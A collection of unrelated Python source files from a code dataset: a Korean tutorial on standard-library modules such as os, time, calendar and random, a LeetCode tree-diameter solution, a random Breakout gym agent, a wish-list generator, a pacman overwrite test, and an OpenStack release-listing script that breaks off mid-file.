# 'PATH': 'C:\\Users\\aimldl\\Anaconda3;
# C:\\Users\\aimldl\\Anaconda3\\Library\\mingw-w64\\bin;
# C:\\Users\\aimldl\\Anaconda3\\Library\\usr\\bin;
# C:\\Users\\aimldl\\Anaconda3\\Library\\bin;
# C:\\Users\\aimldl\\Anaconda3\\Scripts;
# C:\\Users\\aimldl\\Anaconda3\\bin;
# C:\\Users\\aimldl\\Anaconda3\\condabin;
# C:\\Windows\\system32;
# C:\\Windows;
# C:\\Windows\\System32\\Wbem;
# C:\\Windows\\System32\\WindowsPowerShell\\v1.0;
# C:\\Windows\\System32\\OpenSSH;
# C:\\Program Files\\dotnet;
# C:\\Program Files\\Microsoft SQL Server\\130\\Tools\\Binn;
# C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn;
# C:\\Users\\aimldl\\AppData\\Local\\Microsoft\\WindowsApps;.',
# 'PATHEXT': '.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC',
# 'PROCESSOR_ARCHITECTURE': 'AMD64',
# 'PROCESSOR_IDENTIFIER': 'Intel64 Family 6 Model 158 Stepping 9, GenuineIntel',
# 'PROCESSOR_LEVEL': '6',
# 'PROCESSOR_REVISION': '9e09',
# 'PROGRAMDATA': 'C:\\ProgramData',
# 'PROGRAMFILES': 'C:\\Program Files',
# 'PROGRAMFILES(X86)': 'C:\\Program Files (x86)',
# 'PROGRAMW6432': 'C:\\Program Files',
# 'PROMPT': '(base) $P$G',
# 'PSMODULEPATH': 'C:\\Program Files\\WindowsPowerShell\\Modules;
# C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules',
# 'PUBLIC': 'C:\\Users\\Public',
# 'SESSIONNAME': 'Console',
# 'SYSTEMDRIVE': 'C:',
# 'SYSTEMROOT': 'C:\\Windows',
# 'TEMP': 'C:\\Users\\aimldl\\AppData\\Local\\Temp',
# 'TMP': 'C:\\Users\\aimldl\\AppData\\Local\\Temp',
# 'USERDOMAIN': 'DESKTOP-HPVQJ6N',
# 'USERDOMAIN_ROAMINGPROFILE': 'DESKTOP-HPVQJ6N',
# 'USERNAME': 'aimldl',
# 'USERPROFILE': 'C:\\Users\\aimldl',
# 'WINDIR': 'C:\\Windows'})
#>>>
##################################
# os.chdir 디렉터리 위치 변경하기 #
##################################
os.chdir('C:\WINDOWS')
########################################
# os.getcwd 현재 디렉토리 위치 리턴 받기 #
########################################
os.getcwd()
# 'C:\\Users\\aimldl'
###################################
# os.system 시스템 명령어 호출하기 #
###################################
# 시스템 자체의 프로그램, 기타 명령어들을 파이썬에서 호출.
os.system('dir')
# C 드라이브의 볼륨에는 이름이 없습니다.
# 볼륨 일련 번호: E0EE-4D5E
#
# C:\Users\aimldl 디렉터리
#
#2019-07-13 토 오후 03:11 <DIR> .
#2019-07-13 토 오후 03:11 <DIR> ..
#2019-06-25 화 오후 10:09 <DIR> .anaconda
#2019-07-12 금 오후 01:30 <DIR> .android
#2019-07-12 금 오후 01:29 <DIR> .AndroidStudio3.4
#2019-06-26 수 오전 12:08 <DIR> .conda
#2019-06-25 화 오후 10:39 43 .condarc
#2019-06-25 화 오후 10:13 <DIR> .continuum
#2019-07-12 금 오후 12:41 <DIR> .dotnet
#2019-06-25 화 오후 10:11 <DIR> .ipython
#2019-06-26 수 오전 12:49 <DIR> .jupyter
#2019-06-25 화 오후 11:24 <DIR> .keras
#2019-06-25 화 오후 10:11 <DIR> .matplotlib
#2019-07-13 토 오후 04:37 380 .python_history
#2019-07-13 토 오전 12:21 <DIR> .spyder-py3
#2019-07-12 금 오전 08:45 <DIR> 3D Objects
#2019-07-07 일 오후 11:50 <DIR> Anaconda3
#2019-07-12 금 오전 08:45 <DIR> Contacts
#2019-07-13 토 오후 02:38 <DIR> Desktop
#2019-07-12 금 오후 01:05 <DIR> Documents
#2019-07-12 금 오후 05:02 <DIR> Downloads
#2019-07-07 일 오후 11:46 <DIR> Dropbox
#2019-06-25 화 오전 01:20 <DIR> Evernote
#2019-07-12 금 오전 08:45 <DIR> Favorites
#2019-07-12 금 오후 02:38 <DIR> iCloudDrive
#2019-07-12 금 오전 08:45 <DIR> Links
#2019-07-12 금 오전 08:45 <DIR> Music
#2019-07-12 금 오후 02:37 <DIR> OneDrive
#2019-07-12 금 오전 08:45 <DIR> Pictures
#2019-06-25 화 오후 10:35 <DIR> projects
#2019-07-12 금 오전 08:45 <DIR> Saved Games
#2019-07-12 금 오전 08:45 <DIR> Searches
#2019-07-13 토 오후 03:11 40 test.txt
#2019-07-12 금 오전 08:45 <DIR> Videos
# 3개 파일 463 바이트
# 31개 디렉터리 2,907,742,322,688 바이트 남음
#0
#>>>
#############################################
# os.popen 실행한 시스템 명령어의 결과값 받기 #
#############################################
# 시스템 명령어의 실행결과값을 읽기모드 형태의 파일 객체로 리턴한다.
f = os.popen('dir')
print( f )
#<os._wrap_close object at 0x0000021D5142FE48>
print( type(f.read() ))
#<class 'str'>
# 읽어들인 파일 객체의 내용을 보기
# (주의: 바로 위에서 f.read()를 이미 호출했다면 스트림이 소진되어 빈 문자열이 출력된다)
print( f.read() )
# C 드라이브의 볼륨에는 이름이 없습니다.
# 볼륨 일련 번호: E0EE-4D5E
#
# C:\Users\aimldl 디렉터리
#
#2019-07-13 토 오후 03:11 <DIR> .
#2019-07-13 토 오후 03:11 <DIR> ..
#2019-06-25 화 오후 10:09 <DIR> .anaconda
#2019-07-12 금 오후 01:30 <DIR> .android
#2019-07-12 금 오후 01:29 <DIR> .AndroidStudio3.4
#2019-06-26 수 오전 12:08 <DIR> .conda
#2019-06-25 화 오후 10:39 43 .condarc
#2019-06-25 화 오후 10:13 <DIR> .continuum
#2019-07-12 금 오후 12:41 <DIR> .dotnet
#2019-06-25 화 오후 10:11 <DIR> .ipython
#2019-06-26 수 오전 12:49 <DIR> .jupyter
#2019-06-25 화 오후 11:24 <DIR> .keras
#2019-06-25 화 오후 10:11 <DIR> .matplotlib
#2019-07-13 토 오후 04:37 380 .python_history
#2019-07-13 토 오전 12:21 <DIR> .spyder-py3
#2019-07-12 금 오전 08:45 <DIR> 3D Objects
#2019-07-07 일 오후 11:50 <DIR> Anaconda3
#2019-07-12 금 오전 08:45 <DIR> Contacts
#2019-07-13 토 오후 02:38 <DIR> Desktop
#2019-07-12 금 오후 01:05 <DIR> Documents
#2019-07-12 금 오후 05:02 <DIR> Downloads
#2019-07-07 일 오후 11:46 <DIR> Dropbox
#2019-06-25 화 오전 01:20 <DIR> Evernote
#2019-07-12 금 오전 08:45 <DIR> Favorites
#2019-07-12 금 오후 02:38 <DIR> iCloudDrive
#2019-07-12 금 오전 08:45 <DIR> Links
#2019-07-12 금 오전 08:45 <DIR> Music
#2019-07-12 금 오후 02:37 <DIR> OneDrive
#2019-07-12 금 오전 08:45 <DIR> Pictures
#2019-06-25 화 오후 10:35 <DIR> projects
#2019-07-12 금 오전 08:45 <DIR> Saved Games
#2019-07-12 금 오전 08:45 <DIR> Searches
#2019-07-13 토 오후 03:11 40 test.txt
#2019-07-12 금 오전 08:45 <DIR> Videos
# 3개 파일 463 바이트
# 31개 디렉터리 2,907,739,869,184 바이트 남음
#%% 기타 유용한 OS 관련 함수
os.mkdir( directory_name ) # 디렉토리 생성
os.rmdir( directory_name ) # 디렉토리 삭제. 단, 비어있어야 함.
os.unlink( file_name ) # rm, 파일을 지운다.
os.rename(src,dst) # 파일명 변경
#%% shutil
# shutil로 파일을 복사할 수 있다.
# shutil — High-level file operations
# https://docs.python.org/3/library/shutil.html
######################################
# shutil.copy(src, dst) 파일 복사하기 #
######################################
import shutil
shutil.copy('src.txt','dst.txt')
# Q: Why not os.copy? or os.cpy(src,dst)
#%% glob
# glob 특정 디렉토리에 있는 파일이름을 모두 알아야 할 때...
# 파일명의 전체 리스트를 만들거나,
# *,? 등의 메타 문자를 써서 원하는 파일만 읽을 수도 있다.
# glob( pathname ) 디렉터리에 있는 파일들의 리스트 만들기
import glob
glob.glob('C:/Python/q*')
# []
# 다른 예
# (왜냐하면 위의 예는 Win10의 Anaconda Prompt에서 동작하지 않았다.)
os.getcwd()
# 'C:\\Users\\aimldl'
os.system('dir')
# dir의 결과는 위쪽 os.system('dir')의 실행결과를 참고할 것.
glob.glob('D*')
# ['Desktop', 'Documents', 'Downloads', 'Dropbox']
#%% tempfile
# tempfile은 파일을 임시로 만들어서 사용할 때 유용하다.
#####################
# tempfile.mktemp() #
#####################
# 중복되지 않는 임시 파일의 이름을 무작위로 만들어서 리턴한다.
import tempfile
filename = tempfile.mktemp()
filename
#'C:\\Users\\aimldl\\AppData\\Local\\Temp\\tmpt7qbpmb7'
############################
# tempfile.TemporaryFile() #
############################
# 임시 저장 공간으로 사용될 파일 객체를 리턴
# 이 파일은 기본적으로 바이너리 쓰기 모드 (wb)를 갖는다.
# f.close()가 호출되면 이 파일 객체는 자동으로 사라진다.
import tempfile
f = tempfile.TemporaryFile()
f.close()
# Q: 솔직히 용도를 잘 모르겠음.
#%% time
# time모듈은 시간과 관련된 유용한 함수가 많다.
##############
# time.sleep #
##############
# 책에는 마직막인데 제일 앞으로 당김.
# 주로 루프 안에서 일정 시간 간격을 두고 루프를 실행할 때 쓰인다.
# sleep1.py
import time
for i in range(10):
print( i )
time.sleep(1) # 1 sec
#############
# time.time #
#############
# UTC (Universal Time Coordinate, 세계표준시)로 현재 시간을 실수 형태로 리턴한다.
# 기준: 1970년 1월 1일 0시 0분 0초
# 기준시간이후로 지난 시간을 초단위로 리턴함.
import time
time.time()
#1563005221.5239825
##################
# time.localtime #
##################
# 연도,월,일,시,분,초의 형태로 바꿔서 리턴한다.
# time.time()에 의해 반환되는 실수값을 이용
import time
# Option 1
time.localtime()
# time.struct_time(tm_year=2019, tm_mon=7, tm_mday=13, tm_hour=17, tm_min=9, tm_sec=7, tm_wday=5, tm_yday=194, tm_isdst=0)
# Option 2
time.localtime( time.time() )
################
# time.asctime #
################
# time.localtime에서 반환된 튜플형태의 입력을...
# 날짜와 시간을 알아보기 쉬운 형태로 리턴한다.
import time
# Option 1
time.asctime()
# 'Sat Jul 13 17:11:22 2019'
# Option 2
local_time = time.localtime()
time.asctime( local_time )
# 'Sat Jul 13 17:11:22 2019'
# Option 3
time_time = time.time()
local_time = time.localtime( time_time )
time.asctime( local_time )
# 'Sat Jul 13 17:11:22 2019'
##############
# time.ctime #
##############
# Current Time
# time.asctime()와 같은 포맷으로 시간을 리턴한다.
# 단, 현재 시간만 리턴한다는 것이 다르다.
import time
time.ctime()
# 'Sat Jul 13 17:13:27 2019'
#################
# time.strftime #
#################
# time.strftime( format_code, time.locatime() )
# format_code를 지정할 수 있다.
# 예
import time
time.strftime( '%x', time.localtime() )
#'07/13/19'
time.strftime( '%c', time.localtime() )
#'Sat Jul 13 17:16:54 2019'
#%% format code for time.strftime
# TODO: 관련 링크를 넣을 것.
# 책의 p.259에도 있음.
#%% calendar
# calendar는 파이썬에서 달력을 볼 수 있게 한다.
#############################
# calendar.calendar( year ) #
#############################
# 입력한 연도의 전체 달력을 볼 수 있다.
import calendar
print( calendar.calendar(2019) )
# 2019
#
# January February March
#Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
# 1 2 3 4 5 6 1 2 3 1 2 3
# 7 8 9 10 11 12 13 4 5 6 7 8 9 10 4 5 6 7 8 9 10
#14 15 16 17 18 19 20 11 12 13 14 15 16 17 11 12 13 14 15 16 17
#21 22 23 24 25 26 27 18 19 20 21 22 23 24 18 19 20 21 22 23 24
#28 29 30 31 25 26 27 28 25 26 27 28 29 30 31
#
# April May June
#Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
# 1 2 3 4 5 6 7 1 2 3 4 5 1 2
# 8 9 10 11 12 13 14 6 7 8 9 10 11 12 3 4 5 6 7 8 9
#15 16 17 18 19 20 21 13 14 15 16 17 18 19 10 11 12 13 14 15 16
#22 23 24 25 26 27 28 20 21 22 23 24 25 26 17 18 19 20 21 22 23
#29 30 27 28 29 30 31 24 25 26 27 28 29 30
#
# July August September
#Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
# 1 2 3 4 5 6 7 1 2 3 4 1
# 8 9 10 11 12 13 14 5 6 7 8 9 10 11 2 3 4 5 6 7 8
#15 16 17 18 19 20 21 12 13 14 15 16 17 18 9 10 11 12 13 14 15
#22 23 24 25 26 27 28 19 20 21 22 23 24 25 16 17 18 19 20 21 22
#29 30 31 26 27 28 29 30 31 23 24 25 26 27 28 29
# 30
#
# October November December
#Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
# 1 2 3 4 5 6 1 2 3 1
# 7 8 9 10 11 12 13 4 5 6 7 8 9 10 2 3 4 5 6 7 8
#14 15 16 17 18 19 20 11 12 13 14 15 16 17 9 10 11 12 13 14 15
#21 22 23 24 25 26 27 18 19 20 21 22 23 24 16 17 18 19 20 21 22
#28 29 30 31 25 26 27 28 29 30 23 24 25 26 27 28 29
# 30 31
##########################
# calendar.prcal( year ) #
##########################
# calendar.calendar( year )와 동일한 결과
# Q: 그러면 왜 만들어 놓았나?
import calendar
calendar.prcal( 2019 )
###################################
# calendar.prmonth( year, month ) #
###################################
calendar.prmonth( 2019,7 )
# July 2019
#Mo Tu We Th Fr Sa Su
# 1 2 3 4 5 6 7
# 8 9 10 11 12 13 14
#15 16 17 18 19 20 21
#22 23 24 25 26 27 28
#29 30 31
########################################
# calendar.weekday( year, month, day ) #
########################################
# 요일정보,
# 0 월요일
# 1 화요일
# [...]
# 5 토요일
# 6 일요일
calendar.weekday( 2019,7,13 )
# 5
# 토요일
# 07을 입력하면 에러
calendar.weekday( 2019,07,13 )
# SyntaxError: invalid token
#######################
# calendar.monthrange #
#######################
# monthrange는 입력한 년월에 대해
# (1일의 요일, 몇일까지 있는지 )
# 를 튜플로 리턴한다.
calendar.monthrange( 2015, 12 )
# (1, 31)
# 2015년 12월의
# 1의 의미: 화요일, 1일은 1, 즉 화요일이다.
# 31의 의미: 12월은 31일까지이다.
# prmonth로 결과를 확인해보면...
calendar.prmonth(2015, 12)
# December 2015
#Mo Tu We Th Fr Sa Su
# 1 2 3 4 5 6
# 7 8 9 10 11 12 13
#14 15 16 17 18 19 20
#21 22 23 24 25 26 27
#28 29 30 31
#다른 예
calendar.monthrange( 2019, 7 )
# (0, 31)
# 2019년 7월 1일은 월요일이고,
# 이 달은 31일까지 있다.
# 2019년 7월도 확인해보면...
calendar.prmonth(2019, 7)
# July 2019
#Mo Tu We Th Fr Sa Su
# 1 2 3 4 5 6 7
# 8 9 10 11 12 13 14
#15 16 17 18 19 20 21
#22 23 24 25 26 27 28
#29 30 31
#%% random & randint
# random으로 난수 (규칙이 없는 임의의 수)를 발생시킨다.
# 주의: 난수이므로 출력값은 매번 바뀐다.
import random
random.random() # 0.0~1.0 사이의 실수
# 0.3234451917255078
random.randint(1,10) # 1~10 사이의 정수
# 4
random.randint(1,55) # 1~55 사이의 정수
# 43
# random모듈을 이용해서 재미있는 함수를 만들어본다.
# 리스트의 요소 중에서 무작위로 하나를 선택하여 꺼낸 다음 그 값을 리턴한다.
# pop을 하므로 요소는 하나씩 사라진다.
# 이 스크립트는 별도의 파일로 저장해서 실행해야 한다.
# $ python random_pop.py
# 출력값의 한 예는 다음과 같다.
#5
#4
#2
#1
#3
#################
# random_pop.py #
#################
import random
def random_pop(data):
    """Remove and return a randomly chosen element of *data* (mutates the list)."""
    # Pick a random valid index, then pop that element out.
    index = random.randint(0, len(data) - 1)
    return data.pop(index)
if __name__ == "__main__":
    data = [1, 2, 3, 4, 5]
    while data:
        print(random_pop(data))
# 위의 함수는 random.choice함수를 사용해서 아래처럼 조금 더 직관적으로 만들 수 있다.
##################
# random_pop2.py #
##################
def random_pop2(data):
    """Remove and return a random element of *data* via random.choice (mutates the list)."""
    picked = random.choice(data)
    data.remove(picked)
    return picked
if __name__ == "__main__":
    data = [1, 2, 3, 4, 5]
    while data:
        print(random_pop2(data))
##################
# random.shuffle #
##################
# 리스트의 항목을 무작위로 섞을 때 쓸 수 있다.
import random
data = [1,2,3,4,5]
random.shuffle( data )
data
# [3, 2, 4, 1, 5]
#%% webbrowser
# webbrowser로 자신의 시스템에서 사용하는 기본 웹 브라우저를 자동실행 할 수 있다.
import webbrowser
webbrowser.open('http://www.google.com')
# open_new함수는 이미 웹브라우저가 실행된 상태이더라도
# 새로운 창으로 해당 주소가 열리도록 한다.
webbrowser.open_new('http://www.google.com')
| 31.869775 | 400 | 0.508904 |
54c00deca98864734a9ea2fb1379fa401e4950fd
| 616 |
py
|
Python
|
leetcode/543-Diameter-of-Binary-Tree/dfs_recursive_me.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2015-12-16T04:01:03.000Z
|
2015-12-16T04:01:03.000Z
|
leetcode/543-Diameter-of-Binary-Tree/dfs_recursive_me.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2016-02-09T06:00:07.000Z
|
2016-02-09T07:20:13.000Z
|
leetcode/543-Diameter-of-Binary-Tree/dfs_recursive_me.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 2 |
2019-06-27T09:07:26.000Z
|
2019-07-01T04:40:13.000Z
|
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    def diameterOfBinaryTree(self, root: "TreeNode") -> int:
        """Return the diameter of the tree: the longest node-to-node path, in edges."""
        # Only the running maximum matters here; the depth is bookkeeping.
        _, res = self.max_depth(root)
        return res

    def max_depth(self, node: "TreeNode") -> "tuple[int, int]":
        """Return (depth of *node*, best diameter found in its subtree).

        An empty subtree has depth -1 so a leaf gets depth 0 and
        left_depth + right_depth + 2 counts edges on the path through *node*.

        Fixes: TreeNode only exists in a comment above, so the bare
        annotations raised NameError when the class was defined -- they are
        now string forward references.  This method was also annotated
        ``-> int`` although it returns a 2-tuple.
        """
        if node is None:
            return -1, 0
        left_depth, left_max = self.max_depth(node.left)
        right_depth, right_max = self.max_depth(node.right)
        # Best path through this node uses its two deepest arms.
        return max(left_depth, right_depth) + 1, max(left_depth + right_depth + 2, left_max, right_max)
| 30.8 | 103 | 0.616883 |
b7b5a0f33ba89b330993f718c5f06e0741a89e7f
| 1,527 |
py
|
Python
|
tensorflow/basic-rl/tutorial8/gym/breakout/breakout_random.py
|
gopala-kr/ds-notebooks
|
bc35430ecdd851f2ceab8f2437eec4d77cb59423
|
[
"MIT"
] | 1 |
2019-05-10T09:16:23.000Z
|
2019-05-10T09:16:23.000Z
|
tensorflow/basic-rl/tutorial8/gym/breakout/breakout_random.py
|
gopala-kr/ds-notebooks
|
bc35430ecdd851f2ceab8f2437eec4d77cb59423
|
[
"MIT"
] | null | null | null |
tensorflow/basic-rl/tutorial8/gym/breakout/breakout_random.py
|
gopala-kr/ds-notebooks
|
bc35430ecdd851f2ceab8f2437eec4d77cb59423
|
[
"MIT"
] | 1 |
2019-05-10T09:17:28.000Z
|
2019-05-10T09:17:28.000Z
|
'''
Random Breakout AI player
@author: Victor Mayoral Vilches <[email protected]>
'''
import gym
import numpy
import random
import pandas
if __name__ == '__main__':
    # Python 2 script (uses xrange and the builtin reduce): random agent
    # for Atari Breakout driven through the legacy gym monitor API.
    env = gym.make('Breakout-v0')
    env.monitor.start('/tmp/breakout-experiment-1', force=True)
    # video_callable=lambda count: count % 10 == 0)
    goal_average_steps = 195
    max_number_of_steps = 200
    last_time_steps = numpy.ndarray(0)
    n_bins = 8
    n_bins_angle = 10
    number_of_features = env.observation_space.shape[0]
    # NOTE(review): duplicate assignment -- last_time_steps is never
    # appended to anywhere in this block, so the mean()/reduce() reporting
    # below operates on an empty array (and len(l[-100:]) == 0 divides by
    # zero).  Presumably leftovers from the cartpole script this was
    # adapted from -- verify before relying on the printed scores.
    last_time_steps = numpy.ndarray(0)
    # One-hot boolean action masks over 43 slots.  NOTE(review): `actions`
    # is built but unused -- the loop below steps with
    # env.action_space.sample() instead.
    action_attack = [False]*43
    action_attack[0] = True
    action_right = [False]*43
    action_right[10] = True
    action_left = [False]*43
    action_left[11] = True
    actions = [action_attack, action_left, action_right]
    done = False
    observation = env.reset()
    for i_episode in xrange(30):
        if done:
            observation = env.reset()
        for t in xrange(max_number_of_steps):
            env.render()
            # Execute the action and get feedback
            observation, reward, done, info = env.step(env.action_space.sample())
            if done:
                break
    l = last_time_steps.tolist()
    l.sort()
    print("Overall score: {:0.2f}".format(last_time_steps.mean()))
    print("Best 100 score: {:0.2f}".format(reduce(lambda x, y: x + y, l[-100:]) / len(l[-100:])))
    env.monitor.close()
    # gym.upload('/tmp/cartpole-experiment-1', algorithm_id='vmayoral simple Q-learning', api_key='your-key')
| 27.267857 | 109 | 0.639162 |
4deeed8aa1253076ca937b9a354bcdeba019bc51
| 462 |
py
|
Python
|
task_5/create_example.py
|
christopher-besch/bwinf39
|
e5394b37894a56608312057d179029d8a5df98fd
|
[
"MIT"
] | 1 |
2021-01-04T15:16:44.000Z
|
2021-01-04T15:16:44.000Z
|
task_5/create_example.py
|
christopher-besch/bwinf39
|
e5394b37894a56608312057d179029d8a5df98fd
|
[
"MIT"
] | null | null | null |
task_5/create_example.py
|
christopher-besch/bwinf39
|
e5394b37894a56608312057d179029d8a5df98fd
|
[
"MIT"
] | null | null | null |
from random import choice
def main():
    """Emit a random wish list: first line is the student count, then one
    line per student holding 100 distinct wished student numbers.

    Note: nothing excludes a student's own number from their wishes.
    """
    amount_students = 1000
    amount_wishes = 100
    print(amount_students)
    for _ in range(amount_students):
        wishes = []
        # Keep drawing until we have enough distinct wishes.
        while len(wishes) < amount_wishes:
            candidate = choice(range(1, amount_students + 1))
            if str(candidate) not in wishes:
                wishes.append(str(candidate))
        print(" ".join(wishes))
if __name__ == "__main__":
    main()
| 24.315789 | 80 | 0.569264 |
150538a9741d119e14f2e15d72281b72c44210bf
| 74 |
py
|
Python
|
python/coursera_python/WESLEYAN/week3/COURSERA/week_3/t_6.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python/coursera_python/WESLEYAN/week3/COURSERA/week_3/t_6.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python/coursera_python/WESLEYAN/week3/COURSERA/week_3/t_6.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
infilename = input()
outfilename = input()
print(infilename,outfilename)
| 14.8 | 29 | 0.77027 |
4215537d3e39a92788e9a43f55a4d74635db25bf
| 2,281 |
py
|
Python
|
bewerte/note.py
|
jupfi81/NotenManager
|
ee96a41088bb898c025aed7b3c904741cb71d004
|
[
"MIT"
] | null | null | null |
bewerte/note.py
|
jupfi81/NotenManager
|
ee96a41088bb898c025aed7b3c904741cb71d004
|
[
"MIT"
] | null | null | null |
bewerte/note.py
|
jupfi81/NotenManager
|
ee96a41088bb898c025aed7b3c904741cb71d004
|
[
"MIT"
] | null | null | null |
""" Modul, dass die Gesamtnote fuer einen Schueler bestimmt """
import configparser
import os
from statistics import mean
def endnote(schueler, klasserc):
    """Compute a pupil's overall grade (only works when the configured
    categories are exactly 'schriftlich' (written) and 'muendlich' (oral)).

    :param schueler: maps a grading type (e.g. an exam name, lower-case)
        to a list of marks; falsy entries (empty strings) are dropped.
    :param klasserc: path to the class configuration defining the
        sections [basics], [bewertungsart], [arten] and [wichtung].
    :return: the weighted overall grade, rounded to two decimals.
    """
    # Step 1: drop empty marks from every list (mutates the caller's dict,
    # as the original did).
    for art in schueler:
        schueler[art] = [val for val in schueler[art] if val]
    config = configparser.ConfigParser()
    # Bug fix: configparser does not expand '~' itself, so the literal
    # path never resolved and the default config was silently skipped
    # (ConfigParser.read ignores missing files).
    config.read(os.path.expanduser('~/Projekte/KlassenManager/config/defaultrc'))
    config.read(klasserc)
    noten = dict()
    wichtungs_summe = dict()
    for kategorie in config['basics']['Kategorien'].split(','):
        noten[kategorie.strip()] = []
        wichtungs_summe[kategorie.strip()] = 0
    for art in schueler:
        if schueler[art]:
            if config['bewertungsart'][art] == "e":
                # 'e': every single mark counts, each with the type's weight.
                noten[config['arten'][art]] += [float(config['wichtung'][art])
                                                * val for val in schueler[art]]
                wichtungs_summe[config['arten'][art]] += (float(config['wichtung'][art])
                                                          * len(schueler[art]))
            elif config['bewertungsart'][art] == 'g':
                # 'g': only the mean of this type's marks counts, once.
                noten[config['arten'][art]].append(float(config['wichtung'][art])
                                                   * mean(schueler[art]))
                wichtungs_summe[config['arten'][art]] += float(config['wichtung'][art])
    if wichtungs_summe['muendlich']:
        muendlich = sum(noten['muendlich']) / wichtungs_summe['muendlich']
    else:
        # Degenerate input: no weighted oral marks at all.  The sentinel 100
        # keeps the original (questionable) behaviour -- TODO confirm.
        print("note:", schueler)
        muendlich = 100
        print("Etwas mit der Wichtung dern muendlichen Noten stimmt nicht")
    if sum(noten['schriftlich']) == 0:
        # No written marks: the oral average alone is the final grade.
        note = muendlich
    else:
        schriftlich = sum(noten['schriftlich']) / wichtungs_summe['schriftlich']
        note = ((float(config['wichtung']['schriftlich']) * schriftlich
                 + float(config['wichtung']['muendlich']) * muendlich) /
                (float(config['wichtung']['schriftlich']) + float(config['wichtung']['muendlich'])))
    return round(note, 2)
| 43.865385 | 100 | 0.569049 |
42b1be2d3c4471a7cca6c9fb32ef9512a827e432
| 366 |
py
|
Python
|
pacman-termux/test/pacman/tests/overwrite-files-match-negated.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/overwrite-files-match-negated.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/overwrite-files-match-negated.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
# NOTE(review): pactest scenario -- appears to be executed by pacman's
# test harness with the test case bound as `self` and `pmpkg` in scope;
# not a standalone script.  Verify against the pactest documentation.
self.description = "Install a package with an existing file matching a negated --overwrite pattern"
# The package ships a single file "foobar" ...
p = pmpkg("dummy")
p.files = ["foobar"]
self.addpkg(p)
# ... which already exists on the target filesystem.
self.filesystem = ["foobar*"]
# --overwrite=foobar would allow clobbering the file, but the later
# negated pattern !foo* revokes that permission again.
self.args = "-U --overwrite=foobar --overwrite=!foo* %s" % p.filename()
# '!'-prefixed rules assert the negation: the install must not succeed,
# the package must not be installed, and the file must stay unmodified.
self.addrule("!PACMAN_RETCODE=0")
self.addrule("!PKG_EXIST=dummy")
self.addrule("!FILE_MODIFIED=foobar")
676013cbf4f52ac7c30faf41992f7941e996adac
| 1,559 |
py
|
Python
|
intro-vietstack/tools/release-programs.py
|
vietstack/vietstack.github.io
|
6571001dc72751ee89115d9ed520c2b9ca2f2b86
|
[
"MIT"
] | 1 |
2016-11-29T09:35:50.000Z
|
2016-11-29T09:35:50.000Z
|
intro-vietstack/tools/release-programs.py
|
vietstack/vietstack.github.io
|
6571001dc72751ee89115d9ed520c2b9ca2f2b86
|
[
"MIT"
] | 8 |
2016-09-23T01:25:12.000Z
|
2016-11-14T04:02:16.000Z
|
intro-vietstack/tools/release-programs.py
|
vietstack/vietstack.github.io
|
6571001dc72751ee89115d9ed520c2b9ca2f2b86
|
[
"MIT"
] | 14 |
2016-09-22T01:46:57.000Z
|
2019-09-05T05:42:11.000Z
|
#!/usr/bin/python
import os
import sys
import argparse
import yaml
# OpenStack release codenames, oldest first; the list order defines the
# chronology used when comparing 'integrated-since' markers.
releases = [
    'austin', 'bexar', 'cactus',
    'diablo', 'essex', 'folsom',
    'grizzly', 'havana', 'icehouse', 'juno', 'kilo'
]
# Maps release name -> ordinal position in the timeline above.
release_dict = dict((y,x) for x,y in (enumerate(releases)))
def parse_args():
    """Parse command-line arguments: optional --markdown flag plus the
    program YAML path and the target release name."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--markdown', '-m', action='store_true')
    parser.add_argument('program_yaml')
    parser.add_argument('release')
    return parser.parse_args()
def main():
    # Python 2 module (print statements): lists the programs whose first
    # 'integrated-since' project landed on or before the given release.
    args = parse_args()
    with open(args.program_yaml) as fd:
        programs = yaml.load(fd)
    # Ordinal of the requested release in the `releases` timeline.
    target = release_dict[args.release]
    selected = []
    for program,info in programs.items():
        info['program'] = program
        # Find the first project carrying an 'integrated-since' marker;
        # the for/else skips programs that have none at all.
        for project in info['projects']:
            if 'integrated-since' in project:
                break
        else:
            continue
        integrated = release_dict[project['integrated-since']]
        if integrated <= target:
            selected.append(info)
    if args.markdown:
        # Markdown mode: reference-style link list, a blank line, then the
        # matching link definitions.
        for program in sorted(selected, key=lambda x: x['codename']):
            print '- [%s][] (%s)' % (
                program['codename'],
                program['program'])
